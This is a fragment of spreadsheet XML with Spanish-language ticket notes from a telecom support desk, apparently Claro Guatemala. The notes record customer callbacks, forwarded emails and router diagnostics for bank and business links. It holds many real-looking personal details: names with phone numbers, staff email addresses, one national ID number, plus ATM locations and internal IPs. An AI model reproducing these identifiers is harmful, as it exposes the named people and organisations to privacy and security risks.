ID 1001686574 - 1001686589
**</t>
  </si>
  <si>
    <t>**SE LLAMA CLIENTE HUGO ESCICH AL 2521 0500 EXT. 521 OPERADORA INDICA QUE LOS HORARIOS SON DE 8 A 5 PM SE INTENTARA LUEGO **
ID 1001684731
**</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE HUGO ESCICH 25210500 EXT. 521 NO SE LOGRA LA COMUNICACION, OPERADORA INDICA QUE TODOS LOS OPERADORES ESTAN OCUPADOS || SE INTENTARA LUEGO **
-ID 1001748194
**</t>
  </si>
  <si>
    <t>F4588632</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONATHAN MARTINEZ AL 77974200  CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 1001076523
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATHAN MARTINEZ 77974200 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001033941</t>
  </si>
  <si>
    <t>F4588654</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE RUTH, MENCIONA QUE SE TIENE SERVICIO Y SE EL DEJE EN MONTOREO HASTA LAS 16:00 HORAS DE HOY Y ESTARA VALIDAN CONEXIONES Y SE LE INDICO EL ESTADO DEL EQUIPO ETX 1 EN EL ESTADO QUE DEBER ESTAR LEDS: PWR=RED O VERDE, NET 1 = VERDE,  USER 3 =VERDE, MENCIONA QUE SI TIENE CAIDA ESTARA REVISANDO QUE LAS LED SE ENCUENTREN EL EL ESTADO MENCIONADO DE LO CONTRARIO SE COMUNICARA.
1001023845
COLA:
NOMBRE: A: 0050589884144
NÚMERO: 0050589884144
DURACIÓN: 0:05:03
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050589884144
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 3/06/2022 09:02:53</t>
  </si>
  <si>
    <t>F4588659</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUANA SUÑIGA 76522241 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001036332</t>
  </si>
  <si>
    <t>F4588671</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DILMAN MONROY 49890959 MENCIONA QUE PERSISTE LA INESTABILIDAD, SE TRATA DE DEJAR EN CONFERENCIA CON GESTOR PERO CLIENTE CORTA LA LLAMDA
-ID 1001043198 - 1001045652</t>
  </si>
  <si>
    <t>F4588672</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSEPH CASTRO 54397959   PARA BRINDAR RETROALIMENTACION
-ID 1001046827</t>
  </si>
  <si>
    <t>F4588673</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON CHICAS AL 72975350 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001074354
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON CHICAS 72975350 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 1001055849</t>
  </si>
  <si>
    <t>F4588675</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO DONDE EL CLIENTE NOS RESPONDE QUE SE ENCUENTRA ENTERADO SOBRE LA VISITA TECNICA
DE: EDWIN ROBERTO CHAVEZ GARCIA &lt;ROBERTO.CHAVEZ@COFAL.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 11:26
PARA: JAIDELYN YANELI PELICÓ CANIL &lt;JAIDELYN.PELICO@COFAL.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; JOSUE ALEJANDRO MORALES SANDOVAL &lt;JOSUEA.MORALES@CLARO.COM.GT&gt;; CARLOS ALBERTO CHENG LOPEZ &lt;CARLOS.CHENG@COFAL.COM.GT&gt;
CC: SOC EMPRESAS &lt;SOCEMPRESAS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ADM711@COFAL.COM.GT &lt;ADM711@COFAL.COM.GT&gt;; FIDEL ARTURO RAMÍREZ XICAY &lt;ARTURO.RAMIREZ@COFAL.COM.GT&gt;; DIEGO FERNANDO GODOY RECKHOLDER &lt;DIEGO.GODOY@COFAL.COM.GT&gt;; JONATHAN ESTUARDO CABRERA GONZÁLEZ &lt;JONATHAN.CABRERA@COFAL.COM.GT&gt;
ASUNTO: RE: VERIFICACIÓN DE POLÍTICA DE SERVICIOS EN FORTIGATE TKT SD1131824
HOLA BUEN DÍA,
ENTERADO Y COORDINANDO, GRACIAS
SALUDOS,</t>
  </si>
  <si>
    <t>-* SE VALIDA EN CRONOLOGIAS ANTERIORES QUE NO ESTAMOS EN COPIA EN EL ULTIMO CORREO ENVIADO, SE SOLICITA APOYO A CNOC EN COLOCARNOS EN COPIA PARA LA RESPECTIVA VALIDACION CON CLIENTE -*
-*</t>
  </si>
  <si>
    <t>F4588683</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL RODRIGUEZ  70527029 SE DEJA EN CONFERENCIA
-ID 1001056758</t>
  </si>
  <si>
    <t>F4588684</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO BOROR 51163582 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001032486</t>
  </si>
  <si>
    <t>F4588685</t>
  </si>
  <si>
    <t>SE INFORMA A CNOC CLARO VÍA SKYPE QUE SE ASOCIA SD1131903 A TICKET F4588685</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 30070749 / 56116775 / 33238301 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4588687</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ING MARCO PORTILLO 79200844 RESPONDE MANUEL CACERES  QUIEN INDICA QUE EL INCONVENIENTE  ES CON EL ID --  IDG000604 --
-ID 1001021524 - 1001021667 - 1001022574</t>
  </si>
  <si>
    <t>F4588688</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 40150052  OPERADORA INDICA QUE NUMERO NO EXISTE || SE INTENTARA LUEGO **
ID 1001115685
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001142103 - 1001142588</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24119191   NO RESPONDE, SE INTENTARA LUEGO
-ID 1001085069</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RORI RUIZ  30803719 ENVIA DIRECTAMENTE A BUZON
-ID 1001067202</t>
  </si>
  <si>
    <t>**SE LLAMA A CENTRAL 24119191 EXT 10582  NO RESPONDE, SE INTENTARA LUEGO**
-ID 1001073207
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RORI RUIZ  30803719 ENVIA DIRECTAMENTE A BUZON**
-ID 1001073051
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 24119191 EXT 10582  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001068023</t>
  </si>
  <si>
    <t>SE LLLAMA A CLIENTE 24119191  EXT 10582 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001076674</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 40150052  OPERADORA INDICA QUE NUMERO NO EXISTE || SE INTENTARA LUEGO **
ID 1001093205
**</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A BRYAN ALVIZURES/CLIENTE 42617499; SE LE INDICA LO DICHO EN CRONO DE FALLA, ME BRINDA OTRO TEL PR 40150052 PARA SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4588689</t>
  </si>
  <si>
    <t>SE LAMAA CLIENTE RODOLFO REYES 46240171 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMADA EN 5 MIN
-ID 1001060004</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RODOLFO REYES 46240171 MENCIONA QUE NO TENIAN ENERGIA EN PR
CLIENTE CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001063091</t>
  </si>
  <si>
    <t>F4588690</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 10:47
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; REDES Y SEGURIDAD &lt;RED-VSTS@BANCOLOMBIA.ONMICROSOFT.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;
CC: JESSICA FELICITA MARROQUIN FERRERA &lt;JFMARROQ@BANCOAGRICOLA.COM.SV&gt;; MONITOREOCOBA &lt;MONITOREOCOBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; OSCAR ARMANDO CAMINOS CHAVEZ &lt;OCAMINOS@BANCOAGRICOLA.COM.SV&gt;; SOPORTEL2COBA &lt;SOPORTEL2COBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; GERARDO BENJAMIN TOBAR HERNANDEZ &lt;GBTOBAR@BANCOAGRICOLA.COM.SV&gt;; GESTION INCIDENTES TI BANCO AGRICOLA &lt;GEINTIBA@BANCOAGRICOLA.COM.SV&gt;; JOSE MANUEL GRANDE VIDES &lt;JMGRANDE@BANCOAGRICOLA.COM.SV&gt;; ENLACES &lt;ENLACES@BANCOAGRICOLA.COM.SV&gt;; ATMS &lt;ATMS@BANCOLOMBIA.COM.CO&gt;
ASUNTO: RE: TICKET#20491946 ¿ INTERMITENCIA CON EL NODO RUTA_MILITAR-CL-IP2167017
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4588700</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONATAN SANCHEZ 42116235  NO RESPONDE, ENVIA A BUZON | SE INTENTARA LUEGO **
-ID 1001077332
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATAN SANCHEZ 42116235  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001062469 - 1001062706</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATAN SANCHEZ 42116235 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 1001078385</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONATAN SANCHEZ AL 42116235 SOLICITA QUE SE LE LLAME EN 15 MIN QUE CONSULTARA CON PERSONAL EN SITIO **
ID 1001050570
**</t>
  </si>
  <si>
    <t>F4588701</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23742016 QUIEN SOLICITA SE COLOQUE EN COPIA A PERSONAL DE BANRURAL PARA QUE AUTORICEN LOS PERMISOS
-ID 1001096061</t>
  </si>
  <si>
    <t>SE LLAMA A PR PARA PRUEBAS PERO NO RESPONDE ENVIA A BUZON--
51993792</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SEÑOR WALTER ESTUARDO FIGUEROA AL 59790000  Y EL SOLICITA QUE SE LE LLAME AL GERENTE DE AGENCIA **
- ID 1001503295
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 23742016  FRANCISCO GONZALEZ INDICA QUE SE LLAME AL SEÑOR SEÑOR WALTER ESTUARDO FIGUEROA AL 59790000 **
ID 1001502940
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE FAUSTO RAMIREZ BORRAYO AL 51993792 INDICA QUE YA CUENTAN CON LOS ACCESOS QUE SE PUEDE PRESENTAR EL TECNICO **
ID 1001504482
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL ANIBAL GONZALEZ BANRURAL - 57081768 QUIEN INDICA QUE YA ENVIO CORREO PARA QUE PERMITAN EL INGRESO**
ID 1001117940
**</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS EN COLA DE CORREOS, A LA ESPERA DE CONFIRMACIÓN DE ACCESOS **
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 12:24
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; NOC CORPORATIVO &lt;NOC@REDOPTIMA.NET&gt;; AGE GONZALES MAYRA &lt;MAYRA.GONZALES@BANRURAL.COM.GT&gt;; AGE LOPEZ, JOAQUIN &lt;JOAQUIN.LOPEZ@BANRURAL.COM.GT&gt;; ALESSANDRO AJCHE CASTILLO &lt;ALESSANDRO.AJCHE@CLARO.COM.GT&gt;; DAVID CASTAÑEDA &lt;DAVID.CASTANEDA@BANRURAL.COM.GT&gt;; EMILDA RODRIGUEZ &lt;EMILDA.RODRIGUEZ@BANRURAL.COM.GT&gt;; ESTUARDO FGUEROA &lt;ESTUARDO.FIGUEROA@BANRURAL.COM.GT&gt;; HECTOR BARILLAS &lt;HECTOR.BARILLAS@BANRURAL.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: AP AG-79 MOMOSTENANGO Y AG-22 ALARMADOS - BANRURAL
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL INCONVENIENTE PRESENTADO, SE SOLICITA DE SU APOYO SE PUEDA GESTIONAR ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN, YA QUE SE REQUIERE REALIZAR UNA VERIFICACIÓN A NIVEL FÍSICO.
LA VISITA SERÍA PARA LA AG-22 BAJO EL ID 8902630T, UBICADO EN 7 AVENIDA 6-03 ZONA 2 SOLOLA.
TUY GUIT, JOSE	DPI  	2468875160701
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A BANRURAL ( ANIBAL GONZALEZ)
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 12:32
PARA: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; NOC CORPORATIVO &lt;NOC@REDOPTIMA.NET&gt;; AGE GONZALES MAYRA &lt;MAYRA.GONZALES@BANRURAL.COM.GT&gt;; AGE LOPEZ, JOAQUIN &lt;JOAQUIN.LOPEZ@BANRURAL.COM.GT&gt;; ALESSANDRO AJCHE CASTILLO &lt;ALESSANDRO.AJCHE@CLARO.COM.GT&gt;; DAVID CASTAÑEDA &lt;DAVID.CASTANEDA@BANRURAL.COM.GT&gt;; EMILDA RODRIGUEZ &lt;EMILDA.RODRIGUEZ@BANRURAL.COM.GT&gt;; ESTUARDO FGUEROA &lt;ESTUARDO.FIGUEROA@BANRURAL.COM.GT&gt;; HECTOR BARILLAS &lt;HECTOR.BARILLAS@BANRURAL.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ANIBAL.GONZALEZ@BANRURAL.COM.GT &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
ASUNTO: RE: AP AG-79 MOMOSTENANGO Y AG-22 ALARMADOS - BANRURAL
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4588747</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WENDY MARISELA NUÑEZ 98307218 QUIEN CONFIRMA EL FUNCIONAMIENTO DL SERVICIO
-ID 1001106835</t>
  </si>
  <si>
    <t>F4588749</t>
  </si>
  <si>
    <t>SE LE ENVÍA CORREO A CLIENTE CENTRAL VALIDANDO LO DICHO EN CRONO ANTERIOR:
ASUNTO: RE: ENLACE CAÍDO DE LA UNION LARREYNAGA ID: 467331</t>
  </si>
  <si>
    <t>SE HABLÓ CON MALAQUÍAS PANJOJ/CLIENTE 2243-7253 SE LE INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON DIEGO MORA/CLIENTE 2243-7253 SE LE PIDE APOYO CON TELS DE PR; ME BRINDA 505 57981899. SE HABLÓ CON YULI MENDOZA/PR, INDICA QUE ELLA APOYA CON PRUEBAS SI LE ENVÍAN CORREO DE PARTE DE WALMART CENTRAL YURI.MENDOZA@WALMART.COM ; SE INFORMA DE LO ANTERIOR A GERALD TORRES/CENTRAL 2243-7253 VÍA TELEFÓNICA.</t>
  </si>
  <si>
    <t>F4588753</t>
  </si>
  <si>
    <t xml:space="preserve"> SE ENVIA CORREO  A CLIENTE
JUAN PABLO MORALES BARRONDO
VIE 03/06/2022 10:00 A.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107¿¿¿¿¿¿¿¿¿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8753¿¿
ID: 47500627T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0107
UBICADO EN:
ATM107  CENTRO COMERCIAL MOLINO DE LAS FLORES, CALZADA ROOSEVELT KM. 15 ZONA 11
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.</t>
  </si>
  <si>
    <t>INFORMA WALTER DE MONITOREO 5B 24207212, QUE ATM FUE RETIRADO PERO NO TIENE INFORMACION SI ENLACE SERA DADO DE BAJA, POR LO QUE SOLICITA AVOCARSE CON TELECOMUNICACIONES 5B PARA VALDIAR DICHA INFORMACION.
ID
1001300956
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:58
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 4/06/2022 14:33:15</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A TELECOMUNICACIONES 5B || INFORMA WALTER DE MONITOREO 5B 24207212, QUE ATM FUE RETIRADO PERO NO TIENE INFORMACION SI ENLACE SERA DADO DE BAJA, POR LO QUE SOLICITA AVOCARSE CON TELECOMUNICACIONES 5B PARA VALDIAR DICHA INFORMACION.
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE PARA EL ATM:  CC_TYT_GT_ATM0107 NOS INFORMA WALTER DE MONITOREO 5B 24207212, QUE ATM FUE RETIRADO, PERO NO SE TIENE INFORMACIÓN SI SERÁ DEFINITIVO O SI ENLACE SERÁ DADO DE BAJA, SOLICITAMOS SU APOYO CONFIRMANDO SI ENLACE SERÁ DADO DE BAJA PARA PROCEDER CON EL RETIRO DE NUESTRO MONITOREO O BIEN SI ES TEMPORAL INDICARNOS SI ES POSIBLE UN BLOQUEO MOMENTÁNEO EN NUESTRO MONITOREO.
TICKET: F4588753¿¿
ID: 47500627T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0107
UBICADO EN:  ATM107  CENTRO COMERCIAL MOLINO DE LAS FLORES, CALZADA ROOSEVELT KM. 15 ZONA 11
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4588761</t>
  </si>
  <si>
    <t xml:space="preserve"> NO SE OBSERVA OPERATIVO EL SERVICIO POR LO QUE SE ENVIA EL CORREO A CLIENTE PARA NOTIFICAR, EN NMIS 1 SE OBSERVA CAIDO EL SERVICIO NO CUENTA CON PROYECTO DE BAJA
JUAN PABLO MORALES BARRONDO
LUN 06/06/2022 3:16 P.M.
MOSTRAR LOS 13 DESTINATARIOS
PARA:
WGABRIEL@BACCREDOMATIC.GT;
TELEMATICAGT@CREDOMATIC.COM;
CESOLARES@BACCREDOMATIC.GT;
JLOPEZP@BACCREDOMATIC.GT;
EGONZALEZA@BACCREDOMATIC.GT;
JCTORRES@BACCREDOMATIC.GT;
DREGALADOC@BACCREDOMATIC.GT;...
CC:
CNOCCA;
FONSECA BUSTAMANTE, KEVYN ANTONIO;
JOSE RODOLFO ESTRADA MUÑOZ;
EDDY FRANCISCO MONTUFAR ELIAS;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8761¿
ID: 8600191T
IDENTIFICADOR DEL CLIENTE: CC_CREDOMATIC_GT_INTERNET_AGENCIA_0003
UBICADO EN: INTERNET_AVENIDA REFORMA Y 18 CALLE ZONA 10, CENTRO COMERCIAL PLAZA OBELISCO LOCAL 6A, GUATEMALA, GU
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4588764</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AGENTE ENRIQUE RAMÍREZ AL 70744742 - 70701477 NO RESPONDE ||
SE INTENTARA LUEGO **
ID 1001055675 - 1001056215
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AGENTE ENRIQUE RAMÍREZ 70744742 SOLICITA QUE SE PUEDA ATENDER VISITA MAÑANA SABADO A PRIMERA HORA, TECNICO OSCAR RENE VIDES 77421192 ENTERADO
1001190971
COLA:
NOMBRE: A: 0050370744742
NÚMERO: 0050370744742
DURACIÓN: 0:02:03
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050370744742
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 3/06/2022 18:51:30</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AGENTE ENRIQUE RAMÍREZ AL 70744742 INDICA QUE YA REINICIO LOS EQUIPOS PERO NO LEVANTA Y LAS LUCES DEL ROUTER ESTAN EN ROJO || SE NOTIFICA A GESTOR PARA EL SEGUIMIENTO**
ID 1001066843
**</t>
  </si>
  <si>
    <t>F4588775</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DALILA RAJO AL 22066900 CONTESTA LA SEÑORITA MAYRA PEÑA SE TIENE EN LINEA REALIZANDO PRUEBAS INDICA QUE REINICIO EQUIPO PERO NO LEVANTA || SE CONTACTA A GESTOR Y SE DEJA EN LINETA CON CLIENTE **
ID 1001044455 - 1001049323  - 1001049525
**
**</t>
  </si>
  <si>
    <t>F4588782</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS VIELMAN  AL 57748704  SE CONTACTA A CLIENTE Y SE DEJA EN LINEA
CON GESTOR **
ID 1001057011
**</t>
  </si>
  <si>
    <t>F4588783</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE STANLEY QUIEN INDICA QUE NO HA PODIDO HABLAR CON EL PROVEEDOR SOLICITA QUE SE LE LLAME MAÑANA A LAS 8:00AM
1001616742
COLA:
NOMBRE: A: 0050370700120
NÚMERO: 0050370700120
DURACIÓN: 0:00:24
ESTADO: CONECTADA
DETALLES: 0050370700120
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 15:34:18</t>
  </si>
  <si>
    <t>CLIENTE STANLEY CANDRAY 70700120 SOLICITA QUE SE LLAME EL DIA LUNES 06/06 A LAS 9 HORAS PARA VALIDAR YA QUE NECESITA PROBAR LAS LLAMADAS SALIENTES. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SIN EMBARGO NO SE TIENE RESPUESTA.</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE STANLEY CANDRAY, QUIEN INDICA QUE LE URGEN LOS CAMBIOS PARA QUE APAREZCAN LOS DIDS EN LAS LLAMADAS. INDICA QUE LOGRO HABLAR CON EL PROVEEDOR DE LA PBX Y LE INDICO QUE TENIAN QUE RECIBIR 4 DIGITOS Y ENVIAR 4 DIGITOS. SE PROCEDE A CONSULTAR CON EL PERSONAL DE CX.
1001597706
COLA:
NOMBRE: A: 0050370700120
NÚMERO: 0050370700120
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050370700120
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 14:33:23
1001597706
COLA:
NOMBRE: A: 0050370700120
NÚMERO: 0050370700120
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050370700120
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 14:33:23</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE STANLEY Y SE EL EXPLICO QUE EN LA CENTRAL ESTA CONFIGURADA PARA QUE LA PBX RECIBA 4 DIGITOS PARA LAS LLAMADAS ENTRANTES.
PARA LAS LLAMADAS SALIENTES LA CENTRAL NECESITA QUE SE ENVIEN 8 DIGITOS. ACTUALMENTE LA PBX NO TIENE NADA CONFIGURADO. POR LO QUE SE LE SOLICITO AL CLIENTE RECONFIGURAR CON SU PROVEEDOR. INDICA QUE VA HABLAR CON EL Y SOLICITA LLAMADA EN 30MIN.
1001600172
COLA:
NOMBRE: A: 0050370700120
NÚMERO: 0050370700120
DURACIÓN: 0:02:31
ESTADO: CONECTADA
DETALLES: 0050370700120
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 14:43:42</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE STANLEY CANDRAY 70700120, PARA INFORMARLE DE LOS 8 DIGITOS PERO NO CONTESTA.
SE LLAMARA ENSEGUIDA.</t>
  </si>
  <si>
    <t>1001612903
COLA:
NOMBRE: A: 0050370700120
NÚMERO: 0050370700120
DURACIÓN: 0:00:26
CLIENTE SOLICITA VISITA EN CONJUNTO PERO SOLICITA QUE SE LE LLAME EN 10MIN YA TIENE QUE COORDINAR PRIMERO CON EL PROVEEDOR.
ESTADO: CONECTADA
DETALLES: 0050370700120
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 15:22:08</t>
  </si>
  <si>
    <t>F4588785</t>
  </si>
  <si>
    <t>.
SE CONSULTA A PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE LA AGENCIA</t>
  </si>
  <si>
    <t>F4588798</t>
  </si>
  <si>
    <t>SE LLLAMA PUNTO REMOTO ## 51123794 -- DESIRE COLINDRES-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIELA BARRIENTOS41509252 SE TIENE EN LINEA- ##
1001050156
COLA:
NOMBRE: A: 41509252
NÚMERO: 41509252
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 41509252
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 3/06/2022 10:13:14</t>
  </si>
  <si>
    <t>SE TIENE A PUNTOR REMOTO EN LINEA ##NO UBICA EQUIPOS ### NOS MANTENEMOS EN LINEA ##
1001050762
COLA:
NOMBRE: A: 51123794
NÚMERO: 51123794
DURACIÓN: 0:01:25
ESTADO: CONECTADA
DETALLES: 51123794
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 3/06/2022 10:16:42</t>
  </si>
  <si>
    <t>F4588805</t>
  </si>
  <si>
    <t>SRTA.  ANA POCASANGRE ENVIARA FOTOS DEL ESTADO DE LOS EQUIPOS, SE LE SOLICITA APLICAR REINICIO A SU SW YA QUE SUS EQUIPOS NO SE ASOCIAN AL ROUTER HUAWEI DE CLARO ...</t>
  </si>
  <si>
    <t>SRTA.  ANA POCASANGRE NORMALIZA CONEXIONES EN SU RED INTERNA, YA SE OBSERVA LAN CONECTADA Y ASOCIADA. VALIDA ENLACE, SE PROCEDE AL CIERRE DEL INCIDENTE ID: 1001067012.
&lt;ID1035040&gt;DISP ARP ALL
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
10.149.52.89    4400-4DA8-1C23            I -         GE0/0/4
10.149.52.90    18DE-D7EB-BB60  12        D-0         GE0/0/4
190.86.190.214  4400-4DA8-1C22            I -         VLANIF1
192.168.1.1     4400-4DA8-1C22            I -         VLANIF1
192.168.1.44    A027-B679-F547  18        D-0         WLAN-BSS0
                                             1/-
192.168.1.69    66DB-6D04-F6C1  19        D-0         WLAN-BSS0
                                             1/-
190.86.190.212  INCOMPLETE      1         D-0         VLANIF1
                                             1/-
------------------------------------------------------------------------------
TOTAL:7         DYNAMIC:4       STATIC:0     INTERFACE:3
&lt;ID1035040&gt;DISP INT DESC
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     DOWN    DOWN     HUAWEI, AR SERIES, CELLULAR0/0/0
                                               INTERFACE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ID1035040/_/
